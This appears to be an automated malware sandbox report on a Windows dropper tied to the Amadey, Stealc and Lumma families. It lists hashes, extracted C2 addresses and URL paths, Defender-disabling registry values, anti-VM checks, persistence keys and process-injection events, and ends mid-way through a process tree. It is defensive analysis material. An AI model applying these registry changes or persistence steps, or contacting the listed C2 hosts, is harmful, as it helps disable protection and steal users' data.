Analysis
max time kernel: 148s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11-12-2024 16:14
Static task: static1

General
Target: d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe
Size: 7.0MB
MD5: efa400b9a0279efb4a784a071031ea30
SHA1: f94215b10040f2c4ef352273e94e2173de708c8b
SHA256: d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed
SHA512: 83bd505d7a121cb98c05b09fa102e0e15dff10bd135ca2d1d9289095e30425b041615d2ae13fcdf41aa0809f9bed8799897574e4eb24133e87778138efc0bd41
SSDEEP: 98304:eIfgMaIDhyxjMQyaAyaWwCYmAwNQko9vAxdgRCsGEm5zCv5EdPLzichkijAFIPdH:HPaIDHQzaXCYCoIxkmIhmPvPsIPC/3h
Malware Config

Extracted
Family: amadey
Version: 4.42
Botnet: 9c9aa5
C2: http://185.215.113.43
install_dir: abc3bc1985
install_file: skotes.exe
strings_key: 8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths: /Zu7JuNko/index.php

Extracted
Family: lumma
Extracted
Family: stealc
Botnet: stok
C2: http://185.215.113.206
url_path: /c4becf79229cb002.php

Extracted
Family: lumma
Signatures

Amadey family

Gcleaner family

Lumma family

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 1e2a9f4dd4.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 1e2a9f4dd4.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 1e2a9f4dd4.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 1e2a9f4dd4.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 1e2a9f4dd4.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | 4f675h.exe

Stealc family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2G5656.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 3e05g.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 4f675h.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 81320a396c.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0da45764eb.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1e2a9f4dd4.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 8acb171f29.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1F16f1.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | skotes.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2G5656.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1F16f1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2G5656.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4f675h.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 81320a396c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0da45764eb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 8acb171f29.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 8acb171f29.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4f675h.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 81320a396c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | skotes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1F16f1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3e05g.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3e05g.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0da45764eb.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1e2a9f4dd4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1e2a9f4dd4.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | skotes.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | 1F16f1.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | skotes.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | cmd.exe
Executes dropped EXE 19 IoCs
pid | Process
2936 | h6n02.exe
4400 | D8c88.exe
1100 | 1F16f1.exe
3020 | skotes.exe
3064 | 2G5656.exe
4648 | M5iFR20.exe
3500 | 3e05g.exe
4900 | 4f675h.exe
4784 | 646bc9d341.exe
752 | 646bc9d341.exe
312 | 81320a396c.exe
5024 | 0da45764eb.exe
4048 | skotes.exe
1920 | 57a033a9a4.exe
3956 | 1e2a9f4dd4.exe
3236 | 9fadc6f806.exe
4980 | 8acb171f29.exe
6124 | skotes.exe
6792 | skotes.exe
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 1F16f1.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 0da45764eb.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | skotes.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 2G5656.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 3e05g.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 4f675h.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 81320a396c.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 1e2a9f4dd4.exe
Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | 8acb171f29.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 1e2a9f4dd4.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | 4f675h.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 4f675h.exe
Adds Run key to start application 2 TTPs 7 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | h6n02.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | D8c88.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\81320a396c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014089001\\81320a396c.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0da45764eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014090001\\0da45764eb.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\57a033a9a4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014091001\\57a033a9a4.exe" | skotes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1e2a9f4dd4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1014092001\\1e2a9f4dd4.exe" | skotes.exe
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x0008000000023c4e-44.dat | autoit_exe
behavioral1/files/0x0007000000023c61-147.dat | autoit_exe
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid | Process
2912 | tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid | Process
1100 | 1F16f1.exe
3020 | skotes.exe
3064 | 2G5656.exe
3500 | 3e05g.exe
4900 | 4f675h.exe
312 | 81320a396c.exe
5024 | 0da45764eb.exe
4048 | skotes.exe
3956 | 1e2a9f4dd4.exe
4980 | 8acb171f29.exe
6124 | skotes.exe
6792 | skotes.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 4784 set thread context of 752 | 4784 | 646bc9d341.exe | 102
Drops file in Windows directory 1 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\skotes.job | 1F16f1.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
6020 | 4980 | WerFault.exe | 138
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | h6n02.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | tasklist.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 81320a396c.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 57a033a9a4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | skotes.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 0da45764eb.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | 57a033a9a4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | 57a033a9a4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 9fadc6f806.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4f675h.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 3e05g.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | curl.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1F16f1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2G5656.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | M5iFR20.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | systeminfo.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | curl.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 646bc9d341.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | D8c88.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 646bc9d341.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | curl.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | curl.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1e2a9f4dd4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8acb171f29.exe
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid | Process
3356 | systeminfo.exe
Kills process with taskkill 5 IoCs
pid | Process
2396 | taskkill.exe
3424 | taskkill.exe
2556 | taskkill.exe
1484 | taskkill.exe
2232 | taskkill.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | firefox.exe
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid | Process
1100 | 1F16f1.exe
1100 | 1F16f1.exe
3020 | skotes.exe
3020 | skotes.exe
3064 | 2G5656.exe
3064 | 2G5656.exe
3500 | 3e05g.exe
3500 | 3e05g.exe
4900 | 4f675h.exe
4900 | 4f675h.exe
4900 | 4f675h.exe
4900 | 4f675h.exe
312 | 81320a396c.exe
312 | 81320a396c.exe
5024 | 0da45764eb.exe
5024 | 0da45764eb.exe
4048 | skotes.exe
4048 | skotes.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
3956 | 1e2a9f4dd4.exe
3956 | 1e2a9f4dd4.exe
3956 | 1e2a9f4dd4.exe
3956 | 1e2a9f4dd4.exe
3956 | 1e2a9f4dd4.exe
4980 | 8acb171f29.exe
4980 | 8acb171f29.exe
6124 | skotes.exe
6124 | skotes.exe
6792 | skotes.exe
6792 | skotes.exe
Suspicious use of AdjustPrivilegeToken 13 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2912 | tasklist.exe
Token: SeDebugPrivilege | 4900 | 4f675h.exe
Token: SeDebugPrivilege | 2232 | taskkill.exe
Token: SeDebugPrivilege | 2396 | taskkill.exe
Token: SeDebugPrivilege | 3424 | taskkill.exe
Token: SeDebugPrivilege | 2556 | taskkill.exe
Token: SeDebugPrivilege | 1484 | taskkill.exe
Token: SeDebugPrivilege | 1352 | firefox.exe
Token: SeDebugPrivilege | 1352 | firefox.exe
Token: SeDebugPrivilege | 3956 | 1e2a9f4dd4.exe
Token: SeDebugPrivilege | 1352 | firefox.exe
Token: SeDebugPrivilege | 1352 | firefox.exe
Token: SeDebugPrivilege | 1352 | firefox.exe
Suspicious use of FindShellTrayWindow 36 IoCs
pid | Process
1100 | 1F16f1.exe
4648 | M5iFR20.exe
4648 | M5iFR20.exe
4648 | M5iFR20.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
Suspicious use of SendNotifyMessage 34 IoCs
pid | Process
4648 | M5iFR20.exe
4648 | M5iFR20.exe
4648 | M5iFR20.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1352 | firefox.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
1920 | 57a033a9a4.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
1352 | firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 5008 wrote to memory of 2936 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 82
PID 5008 wrote to memory of 2936 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 82
PID 5008 wrote to memory of 2936 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 82
PID 2936 wrote to memory of 4400 | 2936 | h6n02.exe | 83
PID 2936 wrote to memory of 4400 | 2936 | h6n02.exe | 83
PID 2936 wrote to memory of 4400 | 2936 | h6n02.exe | 83
PID 4400 wrote to memory of 1100 | 4400 | D8c88.exe | 84
PID 4400 wrote to memory of 1100 | 4400 | D8c88.exe | 84
PID 4400 wrote to memory of 1100 | 4400 | D8c88.exe | 84
PID 1100 wrote to memory of 3020 | 1100 | 1F16f1.exe | 85
PID 1100 wrote to memory of 3020 | 1100 | 1F16f1.exe | 85
PID 1100 wrote to memory of 3020 | 1100 | 1F16f1.exe | 85
PID 4400 wrote to memory of 3064 | 4400 | D8c88.exe | 86
PID 4400 wrote to memory of 3064 | 4400 | D8c88.exe | 86
PID 4400 wrote to memory of 3064 | 4400 | D8c88.exe | 86
PID 3020 wrote to memory of 4648 | 3020 | skotes.exe | 87
PID 3020 wrote to memory of 4648 | 3020 | skotes.exe | 87
PID 3020 wrote to memory of 4648 | 3020 | skotes.exe | 87
PID 4648 wrote to memory of 4244 | 4648 | M5iFR20.exe | 88
PID 4648 wrote to memory of 4244 | 4648 | M5iFR20.exe | 88
PID 4648 wrote to memory of 4244 | 4648 | M5iFR20.exe | 88
PID 4244 wrote to memory of 3356 | 4244 | cmd.exe | 90
PID 4244 wrote to memory of 3356 | 4244 | cmd.exe | 90
PID 4244 wrote to memory of 3356 | 4244 | cmd.exe | 90
PID 2936 wrote to memory of 3500 | 2936 | h6n02.exe | 92
PID 2936 wrote to memory of 3500 | 2936 | h6n02.exe | 92
PID 2936 wrote to memory of 3500 | 2936 | h6n02.exe | 92
PID 5008 wrote to memory of 4900 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 94
PID 5008 wrote to memory of 4900 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 94
PID 5008 wrote to memory of 4900 | 5008 | d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe | 94
PID 3020 wrote to memory of 4784 | 3020 | skotes.exe | 95
PID 3020 wrote to memory of 4784 | 3020 | skotes.exe | 95
PID 3020 wrote to memory of 4784 | 3020 | skotes.exe | 95
PID 4244 wrote to memory of 2912 | 4244 | cmd.exe | 97
PID 4244 wrote to memory of 2912 | 4244 | cmd.exe | 97
PID 4244 wrote to memory of 2912 | 4244 | cmd.exe | 97
PID 4648 wrote to memory of 4916 | 4648 | M5iFR20.exe | 98
PID 4648 wrote to memory of 4916 | 4648 | M5iFR20.exe | 98
PID 4648 wrote to memory of 4916 | 4648 | M5iFR20.exe | 98
PID 4648 wrote to memory of 4016 | 4648 | M5iFR20.exe | 100
PID 4648 wrote to memory of 4016 | 4648 | M5iFR20.exe | 100
PID 4648 wrote to memory of 4016 | 4648 | M5iFR20.exe | 100
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4784 wrote to memory of 752 | 4784 | 646bc9d341.exe | 102
PID 4648 wrote to memory of 2712 | 4648 | M5iFR20.exe | 103
PID 4648 wrote to memory of 2712 | 4648 | M5iFR20.exe | 103
PID 4648 wrote to memory of 2712 | 4648 | M5iFR20.exe | 103
PID 4648 wrote to memory of 1488 | 4648 | M5iFR20.exe | 104
PID 4648 wrote to memory of 1488 | 4648 | M5iFR20.exe | 104
PID 4648 wrote to memory of 1488 | 4648 | M5iFR20.exe | 104
PID 4648 wrote to memory of 3616 | 4648 | M5iFR20.exe | 107
PID 4648 wrote to memory of 3616 | 4648 | M5iFR20.exe | 107
PID 4648 wrote to memory of 3616 | 4648 | M5iFR20.exe | 107
PID 4648 wrote to memory of 2672 | 4648 | M5iFR20.exe | 109
PID 4648 wrote to memory of 2672 | 4648 | M5iFR20.exe | 109
PID 4648 wrote to memory of 2672 | 4648 | M5iFR20.exe | 109
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe"C:\Users\Admin\AppData\Local\Temp\d25e1e0457e49f45cbfd43e3038fca85a7b1d5b6b90ff506ce82a346016174ed.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h6n02.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\h6n02.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D8c88.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D8c88.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1F16f1.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1F16f1.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
